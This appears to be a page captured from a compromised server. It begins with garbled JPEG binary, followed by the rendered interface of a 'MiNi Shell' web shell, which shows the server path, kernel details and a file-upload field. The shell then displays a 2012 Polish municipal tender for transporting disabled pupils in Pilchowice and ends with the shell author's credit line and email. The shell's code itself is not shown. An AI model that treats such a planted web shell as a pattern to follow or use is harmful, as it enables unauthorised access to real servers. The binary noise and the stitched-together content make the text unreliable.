JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120807/290036-N-2012.html

<p class="kh_header"><b>Pilchowice: Dowóz uczniów niepełnosprawnych do Gliwickiego Ośrodka Rewalidacyjno -Wychowawczego dla Dzieci i Młodzieży Niepełnosprawnej w Gliwicach oraz do szkoły specjalnej w Knurowie.</b><br>
<b>Numer ogłoszenia: 290036 - 2012; data zamieszczenia: 07.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pilchowice , ul. Damrota 6, 44-145 Pilchowice, woj. śląskie, tel. 032 2356521, faks 032 2356938.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pilchowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów niepełnosprawnych do Gliwickiego Ośrodka Rewalidacyjno -Wychowawczego dla Dzieci i Młodzieży Niepełnosprawnej w Gliwicach oraz do szkoły specjalnej w Knurowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest: Dowóz uczniów niepełnosprawnych do Gliwickiego Ośrodka Rewalidacyjno Wychowawczego dla Dzieci i Młodzieży Niepełnosprawnej w Gliwicach oraz do szkoły specjalnej w Knurowie. Zakres zadania nr 1 obejmuje: Wykonanie usług transportowych w zakresie przewozu dzieci z niepełnosprawnością ruchową, upośledzeniem  umysłowym w  stopniu  umiarkowanym i niepełnosprawnościami  sprzężonymi z terenu gminy Pilchowice do Gliwickiego Ośrodka Rewalidacyjno Wychowawczy dla Dzieci i Młodzieży Niepełnosprawnej w Gliwicach. Dowożenie dzieci niepełnosprawnych do Gliwickiego Ośrodka Rewalidacyjno Wychowawczego dla Dzieci i Młodzieży Niepełnosprawnej w Gliwicach w roku szkolnym 2012-2013 i  2013-14  zgodnie z poniższą trasą: kurs poranny przystanek początkowy Wilcza ul. Stawowa 12A Leboszowice ul. Wiejska 38  Żernica ul. Podgórna 22 Gliwice Gliwicki Ośrodek Rewalidacyjno  Wychowawczy dla dzieci i Młodzieży Niepełnosprawnej GORW ul. Słowackiego 58B przystanek  końcowy kurs popołudniowy przystanek początkowy Gliwice Gliwicki Ośrodek Rewalidacyjno  Wychowawczy dla Dzieci i Młodzieży Niepełnosprawnej GORW ul. Słowackiego 58B   Żernica ul. Podgórna 22  Leboszowice ul. Wiejska 38  Wilcza ul. Stawowa 12A  przystanek  końcowy Przewóz uczniów odbywać się będzie zgodnie z kalendarzem roku szkolnego zatwierdzonym przez Ministra Edukacji Narodowej. Zamawiający przewiduje przewóz 4 osób, jednocześnie zastrzega zmianę ilości dzieci do 7 osób co może wiązać się ze zmianą trasy. Dowożenie  dzieci  musi  odbywać  się  autobusem  liczącym  nie  więcej  niż  20  miejsc. Obowiązki Wykonawcy: Dotyczy transportu dzieci niepełnosprawnych Wykonawca jest zobowiązany do wyposażenia pojazdu w środki łączności np. telefon komórkowy. Pojazd używany do transportu dzieci niepełnosprawnych musi być przystosowany do przewozu osób niepełnosprawnych zgodnie z przepisami ustawy Prawo o ruchu drogowym Dz. U. z 2005 r. Nr 108, poz. 908 z pózn. zm. Wykonawca winien zatrudniać kierowców do ww. przedmiotu zamówienia o odpowiednich kwalifikacjach zawodowych. Wykonawca jest zobowiązany dbać o stan techniczny pojazdu. Wykonawca zapewnia bezpieczeństwo, bezawaryjność i punktualność oraz w razie potrzeby opiekę nad dziećmi w ramach przedmiotu zamówienia w tym świadczenie pomocy dzieciom i opiekunowi w zależności od zgłoszonych potrzeb, np. wejście, wyjście dzieci z pojazdu. Wykonawca ponosi pełną odpowiedzialność za zapewnienie bezpiecznych i higienicznych warunków transportu dzieci i ich opiekuna oraz zobowiązuje się do ubezpieczenia pasażerów od następstw nieszczęśliwych wypadków i poniesienia związanych z tym kosztów. Wykonawca odpowiada za opiekę oraz bezpieczeństwo dzieci w drodze z autobusu do budynku ośrodka oraz w drodze z ośrodka do autobusu. W sytuacjach awaryjnych Wykonawca zobowiązuje się do zapewnienia transportu zastępczego dostosowanego do przewozu osób niepełnosprawnych zgodnie z przepisami ustawy Prawo o ruchu drogowym Dz. U. z 2005 r., Nr 108, poz. 908 z pózn. zm. Wykonawca winien współpracować z Zamawiającym w zakresie przedmiotu zamówienia. Wymagania wobec opiekuna zatrudnianego w dowozie przez Wykonawcę. Opiekę nad dziećmi może sprawować osoba pełnoletnia dająca rękojmie bezpiecznego dojazdu dzieci do ośrodka. Obowiązki opiekuna zapewnienie bezpieczeństwa dzieciom i młodzieży w czasie jazdy autobusem do ośrodka oraz służenie pomocą dzieciom w czasie jazdy autobusem, busem,pomoc dzieciom w czasie wsiadania i wysiadania z pojazdu i przekazanie ich osobom wyznaczonym przez dyrektora placówki, do której dowożone są dzieci w przypadku dzieci niepełnosprawnych ruchowo opiekun zobowiązany jest do przenoszenia dziecka do autobusu i z powrotem, opieka oraz zapewnienie bezpieczeństwa dzieci w drodze z autobusu, busa do budynku ośrodka oraz w drodze z budynku ośrodka do autobusu. O liczbie opiekunów w autobusie decyduje wykonawca. Zakres zadania nr 2 obejmuje: Wykonanie usług transportowych w zakresie przewozu dzieci z  niepełnosprawością  ruchową, upośledzeniem umysłowym  w  stopniu  umiarkowanym lub  znacznym  oraz  z  upośledzeniem  umysłowym  z  niepełnosprawnościami  sprzężonymi  z terenu gminy Pilchowice do szkół i przedszkoli specjalnych w Knurowie. Dowożenie dzieci i młodzieży  niepełnosprawnej posiadającej rożne rodzaje niepełnosprawności. Przewóz uczniów odbywać się będzie zgodnie z kalendarzem roku szkolnego zatwierdzonym przez Ministra Edukacji Narodowej. Zamawiający przewiduje przewóz 10 osób, jednocześnie zastrzega zmianę ilości dzieci do 13 osób co może wiązać się ze zmianą trasy. Przebieg trasy: kurs poranny przystanek  początkowy   Żernica ul. Wiśniowa   Pilchowice ul. Rynek 13  Stanica Dworcowa 20, ul. Lipowa 23,Wielopolska 8   Pilchowice ul. Dolna Wieś 29  Wilcza  ul. K. Miarki 48,ul.Stawowa 12A   Knurów MSP 2 ul. Wilsona 22,ul.S.Batorego 7 Gimnazjum 2, SP 9 ul. Szpitalna 25,  przystanek końcowy kurs popołudniowy przystanek  początkowy   Knurów Szpitalna 25 SP 9,  Gimnazjum nr 7 ul. Wilsona  22,MSP  ul. Szpitalna 25   Wilcza  ul. Stawowa 12A, ul. K. Miarki 48   Pilchowice  ul. Dolna Wieś 29,   Stanica  ul. Wielopolska 8,ul. Lipowa 23,ul. Dworcowa 20  Pilchowice  ul.Rynek13   Żernica ul. Wiśniowa   przystanek  końcowy Obowiązki Wykonawcy: Dotyczy transportu dzieci niepełnosprawnych Wykonawca jest zobowiązany do wyposażenia pojazd, pojazdy w środki łączności np. telefon komórkowy. Pojazd używany do transportu dzieci niepełnosprawnych musi być przystosowany do przewozu osób niepełnosprawnych zgodnie z przepisami ustawy Prawo o ruchu drogowym Dz. U. z 2005 r. Nr 108, poz. 908 z pózn. zm. Wykonawca winien zatrudniać kierowców do ww. przedmiotu zamówienia o odpowiednich kwalifikacjach zawodowych. Wykonawca jest zobowiązany dbać o stan techniczny pojazdu, pojazdów. Wykonawca zapewnia bezpieczeństwo, bezawaryjność i punktualność oraz w razie potrzeby opiekę nad dziećmi w ramach przedmiotu zamówienia w tym świadczenie pomocy dzieciom i opiekunowi w zależności od zgłoszonych potrzeb, np. wejście, wyjście dzieci z pojazdu. Wykonawca ponosi pełną odpowiedzialność za zapewnienie bezpiecznych i higienicznych warunków transportu dzieci i ich opiekuna oraz zobowiązuje się do ubezpieczenia pasażerów od następstw nieszczęśliwych wypadków i poniesienia związanych z tym kosztów. Wykonawca odpowiada za opiekę oraz bezpieczeństwo dzieci w drodze z autobusu do budynku szkoły, przedszkola oraz w drodze z budynku szkoły, przedszkola do autobusu.  Wykonawca winien współpracować z Zamawiającym w zakresie przedmiotu zamówienia. Wymagania wobec opiekuna zatrudnianego w dowozie przez Wykonawcę. Opiekę nad dziećmi może sprawować osoba pełnoletnia dająca rękojmie bezpiecznego dojazdu dzieci do szkół, przedszkoli. Obowiązki opiekuna: zapewnienie bezpieczeństwa dzieciom w czasie jazdy autobusem do szkoły, szkół i przedszkola, przedszkoli oraz służenie pomocą dzieciom w czasie jazdy autobusem; pomoc dzieciom w czasie wsiadania i wysiadania z pojazdu i przekazanie ich osobom wyznaczonym przez dyrektora placówki, do której dowożone są dziecko, dzieci; w przypadku dzieci niepełnosprawnych ruchowo opiekun zobowiązany jest do przenoszenia dziecka do autobusu i z powrotem, opieka oraz zapewnienie bezpieczeństwa dzieci w drodze z autobusu do budynku szkoły, przedszkola oraz w drodze z budynku szkoły, przedszkola do autobusu. O liczbie opiekunów w autobusie decyduje wykonawca..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.17.20.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  przypadku  podmiotów  działających  wspólnie   doświadczenie  podlega  sumowaniu.
O zamówienie mogą ubiegać się wykonawcy, których wiedza i doświadczenie pozwoli na prawidłowe wykonanie zamówienia, w szczególności Ci, którzy w ostatnich trzech latach przed dniem terminu składania ofert, a jeżeli okres działalności jest krótszy- w okresie tej działalności, wykonywali, co najmniej, dwie usługi (w ramach dwóch umów) polegające na przewozie dzieci/uczniów  niepełnosprawnych o wartości nie mniejszej niż 30 000 zł brutto rocznie każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, których potencjał techniczny pozwoli na prawidłowe wykonanie zamówienia, w szczególności Wykonawca musi dysponować tyloma pełnosprawnymi środkami transportu na każdą trasę, które umożliwią przewóz z miejscami siedzącymi dla wszystkich dzieci oraz opiekunów. Liczba pojazdów musi gwarantować dotarcie określonej liczby dzieci na zajęcia szkolne, a następnie ich powrót do domów.
Wykonawca musi też dysponować autobusami zastępczymi. Autobusy zastępcze muszą odpowiadać standardowi pojazdów wskazanych w opisie przedmiotu zamówienia.
W przypadku podmiotów działających wspólnie potencjał techniczny podlega sumowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje  istotne  zmiany  postanowień  zawartej  umowy w  stosunku  do  tejże  oferty na  podstawie dokonanego  wyboru  wykonawcy pod  następującymi  warunkami:

-	zmiana liczby dzieci,
-	zmiana liczby dni realizacji zamówienia,
-	zmiana trasy (bez  zmiany  ceny),
-	w przypadku  zmiany osób  zdolnych  do  wykonania zamówienia, wówczas  wykonawca  zawiadomi   o  tym  fakcie zamawiającego. Osoby,  którymi będzie  dysponował wykonawca muszą
spełniać  warunki  określone  w  SIWZ,  
-    w   przypadku  zmiany narzędzi(autobus), którymi  dysponuje  wykonawca. Wówczas  wykonawca
      zawiadamia  o  tym  fakcie  zamawiającego. Potencjał  techniczny (autobusy),którymi  będzie    
     dysponował  wykonawca  musi  spełniać  warunki  określone  w  niniejszej  SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pilchowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Pilchowice
ul. Damrota 6
44-145 Pilchowice
pok nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2012 godzina 08:00, miejsce: Urząd Gminy Pilchowice
ul. Damrota 6
44-145 Pilchowice
pok nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com